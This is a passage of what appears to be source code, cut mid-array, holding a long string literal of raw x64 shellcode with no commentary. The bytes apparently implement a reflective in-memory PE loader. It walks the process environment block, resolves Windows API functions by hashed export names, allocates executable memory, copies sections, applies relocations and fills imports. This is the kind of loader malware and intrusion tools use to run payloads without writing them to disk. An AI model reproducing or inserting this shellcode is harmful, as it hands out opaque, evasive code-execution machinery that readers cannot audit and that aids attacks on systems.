"\xC0\x74\x09\x48\x8B\x4D\x50\x48\x31\xC0\xF3\xAA\x49\xB8\x00\x80\x00\x00\x00\x00\x00\x00\x48\xBA\x00\x00\x00" 115 | "\x00\x00\x00\x00\x00\x48\x8B\x4D\x20\x48\x83\xEC\x20\xFF\x56\x10\x48\x83\xC4\x20\x48\x8B\x7D\x60\x48\x85\xFF" 116 | "\x74\x2C\x48\x8B\x4D\x68\x48\x31\xC0\xF3\xAA\x49\xB8\x00\x80\x00\x00\x00\x00\x00\x00\x48\xBA\x00\x00\x00\x00" 117 | "\x00\x00\x00\x00\x48\x8B\x4D\x60\x48\x83\xEC\x20\xFF\x56\x10\x48\x83\xC4\x20\x5D\xE9\x60\x0A\x00\x00\x00\x00" 118 | "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" 119 | "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" 120 | "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" 121 | 
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" 122 | "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x48\xB8\xFF\xFF\xFF\xFF\xFF\xFF\xFF" 123 | "\xFF\xE9\x2E\xFC\xFF\xFF\x6D\x73\x76\x63\x72\x74\x2E\x64\x6C\x6C\x00\x6D\x73\x76\x63\x72\x74\x64\x2E\x64\x6C" 124 | "\x6C\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" 125 | "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x57\x52\x53\x48" 126 | "\x89\x7D\x00\x48\x89\xFA\x48\x83\xC2\x00\x66\x8B\x1A\x66\x81\xFB\x4D\x5A\x75\x63\x48\x89\xFA\x48\x83\xC2\x3C" 127 | "\x48\x31\xDB\x8B\x1A\x48\x01\xDF\x48\x89\x7D\x08\x48\x89\xFA\x48\x83\xC2\x00\x8B\x1A\x81\xFB\x50\x45\x00\x00" 128 | "\x75\x3F\x48\x89\xFA\x48\x83\xC2\x18\x66\x8B\x1A\x66\x81\xFB\x0B\x02\x75\x2E\x48\x89\xFA\x48\x83\xC2\x14\x48" 129 | "\x31\xDB\x66\x8B\x1A\x48\x89\xFA\x48\x83\xC2\x18\x48\x01\xDA\x48\x89\x55\x10\x48\x89\xFA\x48\x81\xC2\x88\x00" 130 | "\x00\x00\x48\x89\x55\x18\x48\x31\xC0\xEB\x06\x48\x31\xC0\x48\xF7\xD0\x5B\x5A\x5F\xC3\x57\x52\x53\x48\x8B\x7D" 131 | "\x08\x48\x83\xC7\x50\x48\x31\xDB\x8B\x1F\x48\x89\x5D\x50\x48\x8B\x7D\x08\x48\x83\xC7\x30\x48\x8B\x17\x49\xB9" 132 | "\x40\x00\x00\x00\x00\x00\x00\x00\x49\xB8\x00\x30\x00\x00\x00\x00\x00\x00\x48\x89\xD1\x48\x89\xDA\x48\x83\xEC" 133 | "\x20\xFF\x56\x08\x48\x83\xC4\x20\x48\x85\xC0\x75\x25\x49\xB9\x40\x00\x00\x00\x00\x00\x00\x00\x49\xB8\x00\x30" 134 | "\x00\x00\x00\x00\x00\x00\x48\x89\xDA\x48\x31\xC9\x48\x83\xEC\x20\xFF\x56\x08\x48\x83\xC4\x20\x5B\x5A\x5F\xC3" 135 | "\x57\x52\x53\x51\x56\x48\x8B\x76\x48\x48\x8B\x7D\x20\x48\x8B\x5D\x08\x48\x83\xC3\x54\x48\x31\xC9\x8B\x0B\xF3" 136 | "\xA4\x5E\x48\x8B\x7D\x08\x48\x83\xC7\x06\x48\x31\xDB\x66\x8B\x1F\x48\x31\xD2\x48\x39\xD3\x74\x4D\x48\xB8\x28" 137 | "\x00\x00\x00\x00\x00\x00\x00\x52\x48\xF7\xE2\x5A\x48\x03\x45\x10\x56\x48\x8B\x76\x48\x48\x89\xC1\x48\x83\xC1" 138 | 
"\x14\x4D\x31\xD2\x44\x8B\x11\x4C\x01\xD6\x48\x8B\x7D\x20\x48\x89\xC1\x48\x83\xC1\x0C\x4D\x31\xD2\x44\x8B\x11" 139 | "\x4C\x01\xD7\x48\x83\xC0\x10\x48\x31\xC9\x8B\x08\xF3\xA4\x5E\x48\xFF\xC2\xEB\xAE\x48\x31\xC0\xEB\x06\x48\x31" 140 | "\xC0\x48\xF7\xD0\x59\x5B\x5A\x5F\xC3\x57\x52\x53\x51\x48\x8B\x7D\x20\xE8\x6C\xFE\xFF\xFF\x48\x85\xC0\x0F\x85" 141 | "\x50\x01\x00\x00\xE8\x1F\x05\x00\x00\x48\x85\xC0\x0F\x85\x42\x01\x00\x00\x48\x8B\x7D\x00\x48\xB8\x08\x00\x00" 142 | "\x00\x00\x00\x00\x00\x48\xBA\x01\x00\x00\x00\x00\x00\x00\x00\x48\xF7\xE2\x48\x8B\x55\x18\x48\x01\xC2\x48\x83" 143 | "\xC2\x00\x48\x31\xDB\x8B\x1A\x48\x01\xFB\x48\x89\x5D\x30\x48\x39\xFB\x0F\x84\x0F\x01\x00\x00\x49\x89\xDA\x49" 144 | "\x83\xC2\x10\x48\x31\xC0\x41\x8B\x02\x48\x85\xC0\x0F\x84\xF9\x00\x00\x00\x48\x8B\x45\x00\x48\x89\xDA\x48\x83" 145 | "\xC2\x0C\x4D\x31\xD2\x44\x8B\x12\x4C\x01\xD0\x48\x89\xC1\x48\x83\xEC\x20\xFF\x56\x18\x48\x83\xC4\x20\x48\x85" 146 | "\xC0\x0F\x84\xC6\x00\x00\x00\x48\x89\x45\x48\x48\x89\xDA\x48\x83\xC2\x00\x48\x8B\x7D\x00\x4D\x31\xD2\x44\x8B" 147 | "\x12\x4C\x01\xD7\x48\x89\x7D\x38\x48\x89\xDA\x48\x83\xC2\x10\x48\x8B\x7D\x00\x4D\x31\xD2\x44\x8B\x12\x4C\x01" 148 | "\xD7\x48\x89\x7D\x40\x48\x8B\x55\x38\x48\x8B\x12\x48\x85\xD2\x74\x7D\x48\x89\xD7\x49\xBA\x00\x00\x00\x00\x00" 149 | "\x00\x00\x80\x4C\x21\xD7\x74\x0C\x48\x89\xD7\x48\x81\xE7\xFF\xFF\x00\x00\xEB\x0B\x48\x8B\x7D\x00\x48\x01\xD7" 150 | "\x48\x83\xC7\x02\x48\x89\xFA\x48\x8B\x4D\x48\x48\x83\xEC\x20\xFF\x56\x20\x48\x83\xC4\x20\x48\x85\xC0\x74\x46" 151 | "\x48\x8B\x55\x40\x48\x89\x02\xE8\x07\x06\x00\x00\x48\x85\xC0\x74\x0F\xE8\x97\x05\x00\x00\x48\x85\xC0\x75\x05" 152 | "\xE8\xF0\x04\x00\x00\x48\x8B\x55\x38\x48\x83\xC2\x08\x48\x89\x55\x38\x48\x8B\x55\x40\x48\x83\xC2\x08\x48\x89" 153 | "\x55\x40\xE9\x77\xFF\xFF\xFF\x48\x83\xC3\x14\xE9\xF9\xFE\xFF\xFF\x48\x31\xC0\x48\xF7\xD0\xEB\x03\x48\x31\xC0" 154 | "\x59\x5B\x5A\x5F\xC3\x57\x52\x48\x8B\x7D\x08\x48\x83\xC7\x30\x48\x8B\x55\x20\x48\x89\x17\x48\x31\xC0\x5A\x5F" 155 | 
"\xC3\x57\x52\x53\x51\x48\x8B\x55\x28\x48\x85\xD2\x0F\x84\xF5\x00\x00\x00\x48\xB8\x08\x00\x00\x00\x00\x00\x00" 156 | "\x00\x48\xBA\x05\x00\x00\x00\x00\x00\x00\x00\x48\xF7\xE2\x48\x8B\x55\x18\x48\x01\xC2\x49\x89\xD2\x49\x83\xC2" 157 | "\x04\x48\x31\xFF\x41\x8B\x3A\x48\x85\xFF\x0F\x84\xC1\x00\x00\x00\x49\x89\xD2\x49\x83\xC2\x00\x48\x31\xFF\x41" 158 | "\x8B\x3A\x48\x85\xFF\x0F\x84\xA3\x00\x00\x00\x48\x8B\x55\x20\x48\x01\xFA\x49\x89\xD2\x49\x83\xC2\x04\x41\x8B" 159 | "\x3A\x48\x85\xFF\x0F\x84\x91\x00\x00\x00\x48\x83\xEF\x08\x48\xD1\xEF\x48\x31\xC9\x48\x39\xF9\x74\x65\x48\x89" 160 | "\xD3\x48\x83\xC3\x08\x48\x89\xC8\x48\xD1\xE0\x48\x01\xC3\x48\xC7\x45\x58\x00\x00\x00\x00\x66\x8B\x03\x66\x25" 161 | "\x00\xF0\x66\xC1\xE8\x0C\x66\x83\xF8\x00\x74\x37\x66\x83\xF8\x03\x74\x06\x66\x83\xF8\x0A\x75\x2B\x49\x89\xD2" 162 | "\x49\x83\xC2\x00\x41\x8B\x02\x48\x89\x45\x58\x48\x31\xC0\x66\x8B\x03\x66\x25\xFF\x0F\x48\x01\x45\x58\x48\x8B" 163 | "\x45\x20\x48\x03\x45\x58\x48\x8B\x5D\x28\x48\x01\x18\x48\xFF\xC1\xEB\x96\x49\x89\xD2\x49\x83\xC2\x04\x48\x31" 164 | "\xFF\x41\x8B\x3A\x48\x01\xFA\xE9\x64\xFF\xFF\xFF\x48\x31\xC0\x48\xF7\xD0\xEB\x03\x48\x31\xC0\x59\x5B\x5A\x5F" 165 | "\xC3\x57\x52\x53\x51\x48\xB8\x08\x00\x00\x00\x00\x00\x00\x00\x48\xBA\x03\x00\x00\x00\x00\x00\x00\x00\x48\xF7" 166 | "\xE2\x48\x8B\x55\x18\x48\x01\xC2\x48\x89\xD1\x48\x83\xC1\x04\x48\x31\xC0\x8B\x01\x48\x85\xC0\x74\x36\x48\x89" 167 | "\xD1\x48\x83\xC1\x00\x48\x31\xFF\x8B\x39\x48\x85\xFF\x74\x25\x48\x8B\x4D\x20\x49\x89\xC8\x48\x01\xF9\x48\x89" 168 | "\x4D\x78\x48\x31\xD2\xBF\x0C\x00\x00\x00\xF7\xF7\x89\xC2\x48\x83\xEC\x20\xFF\x56\x38\x48\x83\xC4\x20\x48\x31" 169 | "\xC0\x59\x5B\x5A\x5F\xC3\x57\x52\x53\x51\x48\x8B\x7D\x08\x48\x83\xC7\x06\x48\x31\xDB\x66\x8B\x1F\x48\x31\xD2" 170 | "\x48\x39\xD3\x0F\x84\xE6\x00\x00\x00\x48\xB8\x28\x00\x00\x00\x00\x00\x00\x00\x52\x48\xF7\xE2\x5A\x48\x03\x45" 171 | "\x10\x49\x89\xC2\x49\x83\xC2\x24\x48\x31\xFF\x41\x8B\x3A\xC7\x85\xA6\x00\x00\x00\x00\x00\x00\x00\x48\xF7\xC7" 172 | 
"\x00\x00\x00\x02\x0F\x85\x9F\x00\x00\x00\x48\xF7\xC7\x00\x00\x00\x40\x74\x0A\xC7\x85\xA6\x00\x00\x00\x02\x00" 173 | "\x00\x00\x49\xBA\x00\x00\x00\x80\x00\x00\x00\x00\x4C\x85\xD7\x74\x0A\xC7\x85\xA6\x00\x00\x00\x04\x00\x00\x00" 174 | "\x48\xF7\xC7\x00\x00\x00\x20\x74\x26\x83\xBD\xA6\x00\x00\x00\x02\x75\x0A\xC7\x85\xA6\x00\x00\x00\x20\x00\x00" 175 | "\x00\x83\xBD\xA6\x00\x00\x00\x04\x75\x0A\xC7\x85\xA6\x00\x00\x00\x40\x00\x00\x00\x48\x8B\x7D\x20\x48\x89\xC1" 176 | "\x48\x83\xC1\x0C\x4D\x31\xD2\x44\x8B\x11\x4C\x01\xD7\x49\x89\xC2\x49\x83\xC2\x08\x41\x8B\x0A\x52\x4C\x8D\x8D" 177 | "\xAA\x00\x00\x00\x4C\x8B\x85\xA6\x00\x00\x00\x48\x89\xCA\x48\x89\xF9\x48\x83\xEC\x20\xFF\x56\x30\x48\x83\xC4" 178 | "\x20\x5A\x48\x85\xC0\x74\x08\x48\xFF\xC2\xE9\x19\xFF\xFF\xFF\x48\x31\xC0\x48\xF7\xD0\xEB\x03\x48\x31\xC0\x59" 179 | "\x5B\x5A\x5F\xC3\x52\x57\x48\xBA\x00\x00\x00\x00\x00\x00\x00\x00\xEB\x0C\x52\x57\x48\xBA\x01\x00\x00\x00\x00" 180 | "\x00\x00\x00\x48\x8B\x45\x20\x4C\x8B\x55\x08\x49\x83\xC2\x28\x48\x31\xFF\x41\x8B\x3A\x48\x01\xF8\x49\xB8\x00" 181 | "\x00\x00\x00\x00\x00\x00\x00\x48\x8B\x4D\x20\x48\x83\xEC\x20\xFF\xD0\x48\x83\xC4\x20\x48\x31\xC0\x5F\x5A\xC3" 182 | "\x48\x39\xEC\x0F\x8D\xAA\x00\x00\x00\x57\x56\x53\x48\x89\xE6\x48\x83\xC6\x0C\x55\x6A\x00\x48\x89\xE3\x51\x52" 183 | "\x48\x89\xE9\x48\x29\xF1\x48\x83\xF9\x08\x0F\x8C\x81\x00\x00\x00\x50\x52\x53\x48\xB8\x0F\x00\x00\x00\x00\x00" 184 | "\x00\x00\x48\x6B\xC0\x08\x48\x39\xC8\x7D\x03\x48\x89\xC1\x48\xBA\x00\x00\x00\x00\x00\x00\x00\x00\x48\x89\xC8" 185 | "\x48\xBB\x08\x00\x00\x00\x00\x00\x00\x00\x48\xF7\xFB\x48\xFF\xC8\x6A\x00\x48\x83\xF8\x00\x75\xF5\x48\x01\xCC" 186 | "\x5B\x5A\x58\x48\x89\xE5\x48\x89\xE7\x48\x29\xCF\x48\x89\xFC\xF3\xA4\x48\x89\x23\x48\x8B\x4B\xF8\x48\x8B\x53" 187 | "\xF0\x48\xC7\x43\xF8\x00\x00\x00\x00\x48\xC7\x43\xF0\x00\x00\x00\x00\x48\xC7\x04\x24\xFF\xFF\xFF\xFF\x48\xBE" 188 | "\xEE\xEE\xEE\xEE\xEE\xEE\xEE\xEE\xFF\xE0\x59\x59\x5D\x5D\x5B\x5E\x5F\xFF\xE0\x48\x89\xE1\x48\x2B\x4D\x08\x48" 189 | 
"\x83\xE9\x04\x48\x89\xEC\x48\x83\xC4\x0C\x5D\x5B\x5E\x5F\x5A\x48\x01\xCC\xFF\xE2\x00\x00\x00\x00\x57\x52\x53" 190 | "\x51\x48\xB8\x08\x00\x00\x00\x00\x00\x00\x00\x48\xBA\x0C\x00\x00\x00\x00\x00\x00\x00\x48\xF7\xE2\x48\x8B\x55" 191 | "\x18\x48\x01\xC2\x48\x83\xC2\x04\x48\x31\xDB\x8B\x1A\x48\xC1\xEB\x02\x48\xB8\x0F\x00\x00\x00\x00\x00\x00\x00" 192 | "\x48\xF7\xE3\x48\x89\x45\x68\x49\xB9\x40\x00\x00\x00\x00\x00\x00\x00\x49\xB8\x00\x30\x00\x00\x00\x00\x00\x00" 193 | "\x48\x89\xC2\x48\x31\xC9\x48\x83\xEC\x20\xFF\x56\x08\x48\x83\xC4\x20\x48\x85\xC0\x74\x7C\x48\x89\x45\x60\x48" 194 | "\x8B\x46\x58\x48\x8B\xBD\xAE\x00\x00\x00\x48\x83\xC7\x03\x48\x89\x07\x48\x8B\x46\x68\x48\xA9\x00\x00\x00\x00" 195 | "\x74\x2E\x48\x8B\x85\xBE\x00\x00\x00\x48\x8B\x9D\xC6\x00\x00\x00\x48\x89\x03\x48\x8B\x5E\x60\x48\x8B\xBD\xC6" 196 | "\x00\x00\x00\x48\x29\xDF\x48\x8B\x9D\xB6\x00\x00\x00\x48\xFF\xC3\x48\x89\x3B\xEB\x14\x48\x8B\x85\xBE\x00\x00" 197 | "\x00\x48\x8B\xBD\xB6\x00\x00\x00\x48\xFF\xC7\x48\x89\x07\x48\x8B\x46\x68\x48\xA9\x01\x00\x00\x00\x74\x14\x48" 198 | "\x8B\xBD\xB6\x00\x00\x00\xC6\x07\xBF\xEB\x08\x48\x31\xC0\x48\xF7\xD0\xEB\x03\x48\x31\xC0\x59\x5B\x5A\x5F\xC3" 199 | "\x57\x52\x53\x51\x56\x50\x48\x8B\x7D\x60\x48\x8B\x45\x70\x48\x01\xC7\x48\x89\xEE\x48\x81\xC6\x80\x00\x00\x00" 200 | "\x48\xB9\x0F\x00\x00\x00\x00\x00\x00\x00\xF3\xA4\x48\x8B\x7D\x60\x48\x8B\x45\x70\x48\x01\xC7\x48\x83\xC7\x00" 201 | "\x48\xFF\xC7\x48\x8B\x55\x40\x48\x8B\x1A\x48\x89\x1F\x48\x8B\xB5\xCE\x00\x00\x00\x48\x8B\x7D\x60\x48\x8B\x45" 202 | "\x70\x48\x01\xC7\x48\x83\xC7\x0A\x48\xFF\xC7\x48\x83\xC7\x08\x48\x29\xFE\x48\x8B\x7D\x60\x48\x8B\x45\x70\x48" 203 | "\x01\xC7\x48\x83\xC7\x0A\x48\xFF\xC7\x48\x89\x37\x48\x8B\x7D\x60\x48\x8B\x45\x70\x48\x01\xC7\x48\x8B\x75\x40" 204 | "\x48\x89\x3E\x48\x8B\x45\x70\x48\x83\xC0\x0F\x48\x89\x45\x70\x58\x5E\x59\x5B\x5A\x5F\xC3\x57\x52\x53\x51\x56" 205 | "\xEB\x4D\x48\x8B\x7D\x00\x48\x89\xDA\x48\x83\xC2\x0C\x48\x03\x3A\x48\x89\xE9\x48\x81\xC1\x8F\x00\x00\x00\x48" 206 | 
"\x89\xFA\x48\x83\xEC\x20\xFF\x56\x28\x48\x83\xC4\x20\x48\x85\xC0\x74\x22\x48\x89\xE9\x48\x81\xC1\x9A\x00\x00" 207 | "\x00\x48\x89\xFA\x48\x83\xEC\x20\xFF\x56\x28\x48\x83\xC4\x20\x48\x85\xC0\x74\x05\x48\x31\xC0\xEB\x0C\x48\xB8" 208 | "\x01\x00\x00\x00\x00\x00\x00\x00\xEB\x00\x5E\x59\x5B\x5A\x5F\xC3\x57\x52\x53\x51\x56\x48\x8B\x7D\x48\x48\x89" 209 | "\xFA\x48\x83\xC2\x00\x66\x8B\x1A\x66\x81\xFB\x4D\x5A\x0F\x85\x9B\x00\x00\x00\x48\x89\xFA\x48\x83\xC2\x3C\x48" 210 | "\x31\xDB\x8B\x1A\x48\x01\xDF\x48\x89\xFA\x48\x83\xC2\x00\x48\x31\xDB\x8B\x1A\x48\x81\xFB\x50\x45\x00\x00\x75" 211 | "\x77\x48\x89\xFE\x48\x83\xC6\x14\x48\x31\xDB\x66\x8B\x1E\x48\x89\xFE\x48\x83\xC6\x18\x48\x01\xDE\x48\x89\xFB" 212 | "\x48\x83\xC3\x06\x48\x31\xC9\x66\x8B\x0B\x48\x31\xD2\x48\x89\xF3\x48\x83\xC3\x0C\x48\x8B\x7D\x48\x4D\x31\xD2" 213 | "\x44\x8B\x13\x4C\x01\xD7\x48\x39\xF8\x7C\x2B\x48\x89\xF3\x48\x83\xC3\x08\x4D\x31\xD2\x44\x8B\x13\x4C\x01\xD7" 214 | "\x48\x39\xF8\x7D\x16\x49\x89\xF2\x49\x83\xC2\x24\x48\x31\xDB\x41\x8B\x1A\x48\xF7\xC3\x00\x00\x00\x20\x75\x11" 215 | "\x48\x83\xC6\x28\x48\xFF\xC2\x48\x39\xCA\x7C\xB0\x48\x31\xC0\xEB\x0C\x48\xB8\x01\x00\x00\x00\x00\x00\x00\x00" 216 | "\xEB\x00\x5E\x59\x5B\x5A\x5F\xC3\xEB\x4D\x90\x90\x90\x90\x90\x90\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" 217 | "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1E\x00\x00\x00\x21\x0D\x00\x00\x4E\x0D\x00\x00\x00\x09" 218 | "\x00\x00\x00\x5E\x0D\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xE8\x00\x00\x00\x00\x58\x48\x8B\x60\xC6\x48\x8B" 219 | "\x68\xCE\x48\x8B\x70\xD6\x48\x8D\x0D\xCA\xFF\xFF\xFF\x48\x83\xEC\x20\xFF\x56\x40\x48\x83\xC4\x20\xE9\x11\x01" 220 | "\x00\x00\x4C\x89\xC6\xE9\x09\x01\x00\x00\x54\x55\x51\x52\x53\x56\x57\x48\x31\xDB\x65\x48\x8B\x5B\x30\x48\x8B" 221 | "\x5B\x60\x48\x8B\x5B\x18\x48\x8B\x5B\x10\x48\x8B\x73\x60\x48\x85\xF6\x0F\x84\xA6\x00\x00\x00\x48\x8B\x6B\x30" 222 | "\x48\x85\xED\x0F\x84\x99\x00\x00\x00\x48\x31\xD2\xC1\xC2\x05\x66\xAD\x0C\x20\x30\xC2\x66\x83\x3E\x00\x75\xF1" 223 | 
"\x48\x8B\x1B\x48\x3B\x54\x24\x20\x75\xCA\x48\x89\xEF\x66\x81\x3F\x4D\x5A\x75\x73\x8B\x7D\x3C\x48\x01\xEF\x81" 224 | "\x3F\x50\x45\x00\x00\x75\x65\x48\x89\xF9\x48\x83\xC1\x18\x48\x85\xC9\x74\x59\x48\x31\xD2\x8B\xBF\x88\x00\x00" 225 | "\x00\x48\x01\xEF\x8B\x57\x1C\x48\x01\xEA\x8B\x5F\x20\x48\x01\xEB\x8B\x7F\x24\x48\x01\xEF\x49\x89\xD1\x8B\x33" 226 | "\x48\x01\xEE\x48\x31\xD2\xC1\xC2\x05\xAC\x0C\x20\x30\xC2\x80\x3E\x00\x75\xF3\x48\x3B\x54\x24\x18\x74\x0C\x48" 227 | "\x83\xC7\x02\x48\x83\xC3\x04\xE2\xDA\xEB\x10\x48\x0F\xB7\x17\x48\xC1\xE2\x02\x4C\x01\xCA\x8B\x02\x48\x01\xE8" 228 | "\x5F\x5E\x5B\x5A\x59\x5D\x5C\xC3\x06\xDF\xB0\x2C\x51\x33\x8A\x8D\xA4\x00\x78\x95\x27\x85\x00\x3B\x00\xA1\xB4" 229 | "\x00\xDB\xB6\xB6\xE5\x00\xC4\x22\x07\xE2\x00\x82\x5A\x15\x4A\x00\x02\x55\xF0\xD6\xDE\x79\x03\xAA\x86\x00\x0D" 230 | "\xC4\x8A\xDC\x00\x00\x48\x8B\x26\x50\x48\x31\xC0\x48\x8D\x0D\x33\x00\x00\x00\x48\x8D\x1D\x2C\x00\x00\x00\x48" 231 | "\x29\xD9\x48\x89\xDF\xF3\xAA\x48\x8D\x0D\x0D\x00\x00\x00\x48\x8D\x1D\x96\xF0\xFF\xFF\x48\x29\xD9\x48\x89\xDF" 232 | "\xF3\xAA\x58\x41\x5F\x41\x5E\x41\x5D\x41\x5C\x5E\x5F\x5D\x5B\xC3\xEB\x08\x00\x14\x00\x00\x01\x00\x00\x00"; 233 | 234 | --------------------------------------------------------------------------------